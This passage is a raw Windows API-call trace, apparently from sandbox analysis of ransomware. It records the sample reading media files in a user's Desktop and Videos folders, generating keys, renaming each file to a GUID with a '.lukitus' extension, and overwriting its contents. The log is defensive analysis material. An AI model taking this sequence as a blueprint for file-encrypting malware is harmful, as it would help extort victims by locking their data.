lpOverlapped=0x0) returned 1 [0108.938] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.938] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x107e2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x107e2, lpOverlapped=0x0) returned 1 [0108.938] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.938] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f4d2f0, dwHighDateTime=0x1d31760)) [0108.938] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.938] FlushFileBuffers (hFile=0x328) returned 1 [0108.941] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\WjX4e.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\wjx4e.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2f800, ftCreationTime.dwHighDateTime=0x1d300ee, ftLastAccessTime.dwLowDateTime=0xbfba2bf0, ftLastAccessTime.dwHighDateTime=0x1d302e2, ftLastWriteTime.dwLowDateTime=0xbfba2bf0, ftLastWriteTime.dwHighDateTime=0x1d302e2, nFileSizeHigh=0x0, nFileSizeLow=0x5e4e)) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.942] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\WjX4e.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\wjx4e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.942] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\WjX4e.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\wjx4e.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\F56924BE-9663-41BB-5915827A-35CC304703C8.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\f56924be-9663-41bb-5915827a-35cc304703c8.lukitus"), dwFlags=0x9) returned 1 [0108.944] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.944] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.948] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5e4e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5e4e, lpOverlapped=0x0) returned 1 [0108.949] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.949] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5e4e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5e4e, lpOverlapped=0x0) returned 1 [0108.949] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f73450, dwHighDateTime=0x1d31760)) [0108.950] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.950] FlushFileBuffers (hFile=0x328) returned 1 [0108.953] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\2O2msMjE8 v3PZje-.flv" (normalized: "c:\\users\\aetadzjz\\videos\\2o2msmje8 v3pzje-.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cadb9f0, ftCreationTime.dwHighDateTime=0x1d2fdd9, ftLastAccessTime.dwLowDateTime=0x2d6a51e0, ftLastAccessTime.dwHighDateTime=0x1d2fa17, ftLastWriteTime.dwLowDateTime=0x2d6a51e0, ftLastWriteTime.dwHighDateTime=0x1d2fa17, nFileSizeHigh=0x0, nFileSizeLow=0x152fa)) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.953] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\2O2msMjE8 v3PZje-.flv" (normalized: "c:\\users\\aetadzjz\\videos\\2o2msmje8 v3pzje-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.953] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\2O2msMjE8 v3PZje-.flv" (normalized: "c:\\users\\aetadzjz\\videos\\2o2msmje8 v3pzje-.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-165E2571-3D1F7BCD1A64.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-165e2571-3d1f7bcd1a64.lukitus"), dwFlags=0x9) returned 1 [0108.955] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.955] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.960] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x152fa, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x152fa, lpOverlapped=0x0) returned 1 [0108.960] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.961] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x152fa, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x152fa, lpOverlapped=0x0) returned 1 [0108.961] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f73450, dwHighDateTime=0x1d31760)) [0108.961] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.961] FlushFileBuffers (hFile=0x328) returned 1 [0108.966] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\25w3DegZoT.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\25w3degzot.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd66e50, ftCreationTime.dwHighDateTime=0x1d2f64e, ftLastAccessTime.dwLowDateTime=0xbbf8840, ftLastAccessTime.dwHighDateTime=0x1d2f9ee, ftLastWriteTime.dwLowDateTime=0xbbf8840, ftLastWriteTime.dwHighDateTime=0x1d2f9ee, nFileSizeHigh=0x0, nFileSizeLow=0x34ff)) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.967] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\25w3DegZoT.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\25w3degzot.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.967] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\25w3DegZoT.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\25w3degzot.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-AD0F9D60-FC98F622FDAF.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-ad0f9d60-fc98f622fdaf.lukitus"), dwFlags=0x9) returned 1 [0108.968] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.968] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.973] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x34ff, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x34ff, lpOverlapped=0x0) returned 1 [0108.974] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.974] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x34ff, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x34ff, lpOverlapped=0x0) returned 1 [0108.974] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.974] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64f995b0, dwHighDateTime=0x1d31760)) [0108.974] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.974] FlushFileBuffers (hFile=0x328) returned 1 [0108.977] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\7nbksoZkyYF4fahzyE.swf" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\7nbksozkyyf4fahzye.swf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53f8a80, ftCreationTime.dwHighDateTime=0x1d2fbd4, ftLastAccessTime.dwLowDateTime=0x2b5e54c0, ftLastAccessTime.dwHighDateTime=0x1d302a8, ftLastWriteTime.dwLowDateTime=0x2b5e54c0, ftLastWriteTime.dwHighDateTime=0x1d302a8, nFileSizeHigh=0x0, nFileSizeLow=0xa22b)) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.977] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.978] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\7nbksoZkyYF4fahzyE.swf" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\7nbksozkyyf4fahzye.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.978] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\7nbksoZkyYF4fahzyE.swf" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\7nbksozkyyf4fahzye.swf"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-5221E3EB-AE9961740B1D.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-5221e3eb-ae9961740b1d.lukitus"), dwFlags=0x9) returned 1 [0108.982] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.982] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.987] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa22b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa22b, lpOverlapped=0x0) returned 1 [0108.987] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.987] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa22b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xa22b, lpOverlapped=0x0) returned 1 [0108.988] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.988] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64fbf710, dwHighDateTime=0x1d31760)) [0108.988] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.988] FlushFileBuffers (hFile=0x328) returned 1 [0108.991] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\h wpWI.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\h wpwi.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb27da0, ftCreationTime.dwHighDateTime=0x1d2fcdc, ftLastAccessTime.dwLowDateTime=0x170eaf10, ftLastAccessTime.dwHighDateTime=0x1d2fb41, ftLastWriteTime.dwLowDateTime=0x170eaf10, ftLastWriteTime.dwHighDateTime=0x1d2fb41, nFileSizeHigh=0x0, nFileSizeLow=0x7b3e)) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.991] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 